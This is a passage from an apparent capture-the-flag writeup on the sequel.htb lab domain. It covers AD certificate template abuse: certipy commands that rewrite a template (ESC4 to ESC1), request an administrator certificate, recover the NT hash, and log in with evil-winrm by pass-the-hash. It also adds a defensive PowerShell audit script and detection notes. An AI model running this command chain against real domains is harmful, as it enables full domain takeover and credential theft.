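Run against the state the writeup leaves behind, this reports ryan twice on ca_svc (as owner and with FullControl). On the detection side, with Directory Service Changes auditing enabled the owner and DACL rewrites appear on the domain controller as event 5136 modifications of nTSecurityDescriptor, and the rpcclient reset as event 4724; impacket-dacledit also wrote dacledit.bak, which is the copy to restore from.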
Once we have access to the ca_svc user, we look for vulnerabilities in the Active Directory Certificate Services templates using the certipy-ad tool.
$ certipy-ad find -username ca_svc@sequel.htb -password new_password -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
We find a vulnerability in the Certification Authority sequel-DC01-CA and its template DunderMifflinAuthentication. ESC4 means that the group SEQUEL.HTB\Cert Publishers has dangerous permissions over the template. We can abuse this vulnerability by modifying the template to enable other vulnerabilities and then use them to generate an authentication certificate for the Administrator user. We start by rewriting the template, saving the original.
$ certipy-ad template -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
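Rewriting the template turns an ESC4 finding (write control over the template object) into an ESC1 shape: the enrollee supplies the subject, the certificate carries a logon EKU, and nothing gates issuance, which is what allows the request below to name administrator@sequel.htb. The following is an added example, not part of the writeup, that audits every template in the configuration partition for both conditions: ACEs granting write control to principals outside a trusted set (ESC4, here SEQUEL.HTB\Cert Publishers), and the flag combination plus broad enrollment rights that make an ESC1-style request possible. It requires the ActiveDirectory module; the trusted-principal list is an assumption.

```powershell
# Added example, not part of the writeup: audit certificate templates for
# non-tier-0 write control (ESC4) and for the enrollee-supplies-subject plus
# logon-EKU shape a rewritten template ends up in (ESC1).
# Requires the ActiveDirectory module; the trusted list is an assumption.

Import-Module ActiveDirectory

$trusted = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'Administrator',
             'SYSTEM', 'ENTERPRISE DOMAIN CONTROLLERS')
function Test-TrustedPrincipal {
    param([string]$Identity)
    $trusted -contains ($Identity -split '\\')[-1]
}

# Template flag bits (MS-CRTD), the Certificate-Enrollment control right, and
# the EKUs that make a certificate usable for logon.
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # in msPKI-Enrollment-Flag: manager approval
$CertificateEnrollmentGuid = [guid]'0e10c968-78fb-11d1-a9c0-0000f80367c1'
$LogonEkus = @('1.3.6.1.5.5.7.3.2',        # Client Authentication
               '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
               '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
               '2.5.29.37.0')              # Any Purpose

function Get-CertificateTemplateFindings {
    $cfgNc = (Get-ADRootDSE).configurationNamingContext
    $base  = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$cfgNc"
    $props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', 'pKIExtendedKeyUsage'
    $templates = Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props

    foreach ($t in $templates) {
        $acl = Get-Acl -Path "AD:\$($t.DistinguishedName)"
        $enrollers = @()

        # ESC4: anyone outside the trusted set who can rewrite the template object.
        # WriteProperty only counts when ObjectType is empty (all attributes).
        if (-not (Test-TrustedPrincipal $acl.Owner)) {
            [pscustomobject]@{ Template = $t.Name; Finding = 'ESC4'; Principal = $acl.Owner; Detail = 'Owner' }
        }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value
            if (Test-TrustedPrincipal $who) { continue }
            $rights = $ace.ActiveDirectoryRights.ToString()
            $canRewrite = ($rights -match 'GenericAll|WriteOwner|WriteDacl|GenericWrite') -or
                          ($rights -match 'WriteProperty' -and $ace.ObjectType -eq [guid]::Empty)
            if ($canRewrite) {
                [pscustomobject]@{ Template = $t.Name; Finding = 'ESC4'; Principal = $who; Detail = $rights }
            }
            # Enroll right (or GenericAll) for a non-trusted principal feeds the ESC1 check.
            if ($rights -match 'GenericAll' -or
                ($rights -match 'ExtendedRight' -and
                 ($ace.ObjectType -eq $CertificateEnrollmentGuid -or $ace.ObjectType -eq [guid]::Empty))) {
                $enrollers += $who
            }
        }

        # ESC1 shape: requester chooses the subject/SAN, the cert authenticates,
        # no approval or co-signature gates issuance, and a non-trusted principal
        # can enroll. An empty EKU list means any purpose, which also qualifies.
        $enrolleeSubject = ($t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
        $needsApproval   = ($t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
        $needsSignature  = [int]$t.'msPKI-RA-Signature' -gt 0
        $ekus            = @($t.'pKIExtendedKeyUsage')
        $logonEku        = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $LogonEkus -contains $_ })
        if ($enrolleeSubject -and $logonEku -and -not $needsApproval -and -not $needsSignature -and $enrollers.Count -gt 0) {
            [pscustomobject]@{ Template = $t.Name; Finding = 'ESC1'; Principal = ($enrollers -join ', ');
                               Detail = 'EnrolleeSuppliesSubject + logon EKU, no approval/signature' }
        }
    }
}

Get-CertificateTemplateFindings | Format-Table -AutoSize
```

Run before the rewrite this reports only the ESC4 entries for Cert Publishers; run after it the same template also shows up as ESC1. The saved DunderMifflinAuthentication.json is the reference copy for restoring the template, and the request itself leaves Request ID 8 in the CA's issued-certificates log with a UPN that does not belong to the requesting account, which is the artifact to hunt for.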
We request the domain administrator's certificate using the new template.
$ certipy-ad req -ca sequel-DC01-CA -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -upn administrator@sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Finally we authenticate using the certificate to obtain the NTLM hash string, 7a8d4e04986afa8ed4060f75e5a0b3ff.
$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
We can log in as the domain Administrator using evil-winrm.
$ evil-winrm -i sequel.htb -u 'Administrator' -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Flags
From the domain administrator console we can retrieve the user and administrator flags.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
<REDACTED>